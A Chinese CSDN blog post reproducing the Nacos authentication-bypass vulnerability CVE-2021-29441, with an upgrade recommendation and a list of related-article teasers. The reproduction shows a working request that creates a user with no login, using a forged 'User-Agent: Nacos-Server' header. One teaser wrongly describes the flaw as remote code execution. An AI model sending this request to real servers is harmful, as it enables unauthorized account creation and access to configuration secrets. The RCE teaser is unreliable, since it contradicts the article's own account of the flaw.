【Nacos未授权访问漏洞(CVE-2021-29441)复现】

最新推荐文章于 2025-03-23 22:01:28 发布
最新推荐文章于 2025-03-23 22:01:28 发布
阅读量3.8k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/134057381
版权
本文揭示了Nacos开源项目中的认证漏洞,攻击者可利用简单判断的user-agent绕过权限获取敏感信息。影响范围限定于Nacos2.0.0-ALPHA.1以下版本。修复建议为升级至最新版本以确保安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

一、声明

本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。

二、漏洞描述

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息

三、漏洞影响范围

Nacos版本<=Nacos 2.0.0-ALPHA.1

四、漏洞复现

1、来到登陆界面
在这里插入图片描述
2、验证是否可能存在漏洞
未登陆情况下浏览器访问如下接口

http://x.x.x.x/nacos/v1/auth/users?pageNo=1&pageSize=1

在这里插入图片描述出现这种界面就很可能存在漏洞

3、抓包修改数据包

POST /nacos/v1/auth/users?username=test10&password=test10
User-Agent: Nacos-Server
pageNo=1&pageSize=9

在这里插入图片描述
发现创建用户成功

4、返回登陆界面登陆
在这里插入图片描述

五、修复建议

升级到最新版本的 Nacos

nacos未授权添加用户漏洞CVE-2021-29441
千寻的博客
11-04 1718
但是由于配置的过于简单,并且将协商好的`user-agent设置为Nacos-Server`,直接硬编码在了代码里,导致了漏洞的出现。 * 并且利用这个未授权漏洞,攻击者可以`获取到用户名密码`等`敏感信息`。
[CVE-2021-29441]Nacos未授权访问漏洞漏洞复现
wxtnb4的博客
10-13 1970
Nacos 致力于帮助开发者发现、配置和管理微服务,提供了全面的微服务解决方案,包括服务的动态注册与发现、服务的元数据管理、动态配置服务、动态 DNS 服务、服务和元数据管理。在请求数据的过程中,服务器会去识别user-agent ,当user-agent为Nacos-Server时,则不需要进行认证,而且是直接将这种验证方式硬编码在代码中,从而导致此漏洞的产生。前面说过,如果访问时,将useragent改为Nacos-Server,就不会需要认证,在这种情况下,我们先尝试访问
Nacos未授权访问漏洞复现
apple_52661176的博客
07-09 1465
nacos未授权访问漏洞的几种姿势
nacos未经授权创建用户漏洞
最新发布
秦子腾
03-23 451
打开nacos部署服务器输入命令 curl -XPOST -d “username=test123&password=test!
JDK安装2023最完整教程与配置(零基础)
bdfcfff77fa的博客
06-19 1524
JDK安装2023最完整教程与配置(零基础)
nacos未授权-CVE-2021-29441复现
crowsec
07-21 8141
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
Nacos漏洞修复】Nacos未授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 1万+
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
【渗透实战】Nacos未授权访问CVE-2021-29441
Nafia的博客
02-20 5618
Nacos未授权访问漏洞挖掘记录
NACOS漏洞问题及修复(CVE-2021-29441)
热门推荐
Hoopy_Hoopy的博客
09-14 1万+
目录 1.漏洞相关问题 2.场景复现 2.1访问用户列表界面 2.2添加新用户 2.3再次查看用户列表 3.nacos升级 4.代码升级 1.漏洞相关问题 漏洞相关地址 CVE-2021-29441 - Nacos is a platform designed for dynamic service discovery and configuration and service management. - CVE-Searchhttps://cve.circl.lu/cve/CVE-20
Nacos认证绕过漏洞CVE-2021-29441
tpaer的博客
12-16 2187
复现Nacos认证绕过漏洞,导致未授权的任意访问
Nacos 认证绕过漏洞CVE-2021-29441
gaomei2009的专栏
06-20 756
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。
Nacos权限绕过漏洞(CVE-2021-29441)复现
大大怪将军,你来啦!
04-14 6051
CVE-2021-29441Nacos 组件中的一个权限验证漏洞,该漏洞允许未授权的攻击者绕过认证,进而获取服务器的敏感信息或执行未授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问
Nacos未授权访问漏洞
00勇士王子的博客
02-27 6594
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
Nacos未授权访问复现及修复
大数据姐姐
01-22 4757
Nacos未授权访问修复,开启鉴权
Nacos未授权访问
zkaqlaoniao的博客
12-08 2193
漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。通过版本漏洞,攻击者可以在不登陆系统的情况下读取已存在的用户或者添加用户,进而登陆系统,登陆系统后可获取大量配置信息以发起进一步攻击。
Nacos漏洞总结复现_nacos默认jwt密钥导致未授权访问
yy1715713348的博客
08-12 1294
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Nacos 未授权访问(CVE-2021-29441)
m0_62207170的博客
08-30 1208
Nacos 未授权访问(CVE-2021-29441)
Nacos 漏洞汇总
Bird&Bird
03-11 1万+
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-S
漏洞复现Nacos未授权访问
lza20001103的博客
09-18 1018
漏洞复现Nacos未授权访问
nacos漏洞CVE-2021-29441如何解决
07-24
**Nacos 漏洞 CVE-2021-29441 解决方案** 在探讨 NacosCVE-2021-29441 总览 Nacos 是一款开源的服务发现、配置中心和微服务治理平台。CVE-2021-29441 是关于 Nacos 中存在的一个远程代码执行(RCE)漏洞。攻击者利用此漏洞可以发送恶意请求至 Nacos Server 端点,通过构造特定的 HTTP 请求头来执行任意命令,从而可能导致服务器崩溃或被控制。 ### 漏洞原因分析 这个漏洞主要是由于 Nacos 对某些 HTTP 请求头处理不当,未能充分过滤或验证输入的敏感字符序列,导致恶意用户能够注入并执行恶意命令。 ### 解决方案 为了修复这一安全风险,Nacos 开发团队发布了补丁,并建议所有用户采取以下几个步骤: 1. **升级到最新版本**:最直接有效的办法是将 Nacos 更新到最新的稳定版,这通常包含对已知安全漏洞的修复。访问官方发布页面查找最新版本并按照文档指引进行更新。 - [Nacos 官方 GitHub 页面](https://github.com/alibaba/nacos/releases) 2. **禁用不受支持的功能**:如果您的部署暂时无法升级,可以尝试关闭或禁用那些可能导致攻击的特定功能。Nacos 提供了详细的管理界面选项来控制其操作模式和端口暴露,注意避免开启不必要的对外接口和服务。 3. **实施网络隔离与防火墙策略**:即便使用了最新版本的 Nacos,也应确保内部网络环境的安全,包括但不限于限制外部网络Nacos 服务的访问权限,设置合理的防火墙规则以阻止非授权的通信。 4. **定期审核安全配置**:持续监控 Nacos 配置文件和日志记录,检查是否有异常活动,以及是否有人尝试利用此漏洞进行攻击。同时,考虑采用审计工具和入侵检测系统 (IDS) 来加强安全性。 5. **开展安全培训**:提升团队成员对于最新威胁的意识,强化安全最佳实践,如避免硬编码敏感信息、正确处理用户输入等,降低人为错误引入安全隐患的可能性。 ### 结论 修复 Nacos 中的 CVE-2021-29441 漏洞不仅涉及到软件版本的更新,还需要全面的安全风险管理措施。及时响应安全公告,结合实际业务场景制定综合防护策略,是保护系统免受此类攻击的关键所在。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值